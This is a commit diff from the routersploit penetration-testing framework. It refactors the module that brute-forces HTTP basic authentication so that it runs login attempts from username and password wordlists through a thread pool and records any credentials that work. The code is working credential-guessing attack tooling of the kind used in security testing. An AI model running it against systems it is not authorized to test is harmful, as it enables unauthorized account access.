Skip to content

R
routersploit
Commit b20ff7cf by fwkz
Options

Using ThreadPoolExecutor in creds/http_basic_bruteforce

parent 66bdaefa
Showing with 20 additions and 31 deletions
routersploit/modules/creds/http_basic_bruteforce.py
...@@ -6,15 +6,16 @@ from routersploit import ( ...@@ -6,15 +6,16 @@ from routersploit import (
wordlists, wordlists,
print_status, print_status,
print_error, print_error,
LockedIterator,
print_success, print_success,
print_table, print_table,
sanitize_url,
http_request, http_request,
boolify,
multi, multi,
threads,
validators,
) )
from routersploit.exceptions import StopThreadPoolExecutor
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
...@@ -36,17 +37,15 @@ class Exploit(exploits.Exploit): ...@@ -36,17 +37,15 @@ class Exploit(exploits.Exploit):
], ],
} }
target = exploits.Option('', 'Target IP address or file with target:port (file://)') target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
port = exploits.Option(80, 'Target port') port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Numbers of threads') threads = exploits.Option(8, 'Numbers of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)') usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
path = exploits.Option('/', 'URL Path') path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts') verbosity = exploits.Option(True, 'Display authentication attempts', validators=validators.boolify)
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') stop_on_success = exploits.Option(True, 'Stop on first valid authentication attempt', validators=validators.boolify)
credentials = []
def run(self): def run(self):
self.credentials = [] self.credentials = []
...@@ -54,7 +53,7 @@ class Exploit(exploits.Exploit): ...@@ -54,7 +53,7 @@ class Exploit(exploits.Exploit):
@multi @multi
def attack(self): def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
if response is None: if response is None:
...@@ -74,41 +73,31 @@ class Exploit(exploits.Exploit): ...@@ -74,41 +73,31 @@ class Exploit(exploits.Exploit):
else: else:
passwords = [self.passwords] passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords)) collection = itertools.product(usernames, passwords)
self.run_threads(self.threads, self.target_function, collection) with threads.ThreadPoolExecutor(self.threads) as executor:
for record in collection:
executor.submit(self.target_function, url, record)
if len(self.credentials): if self.credentials:
print_success("Credentials found!") print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password") headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials) print_table(headers, *self.credentials)
else: else:
print_error("Credentials not found") print_error("Credentials not found")
def target_function(self, running, data): def target_function(self, url, creds):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) user, password = creds
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip() user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip() password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password)) response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401: if response is not None and response.status_code != 401:
if boolify(self.stop_on_success): print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity)
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password)) self.credentials.append((self.target, self.port, user, password))
if self.stop_on_success:
raise StopThreadPoolExecutor
else: else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment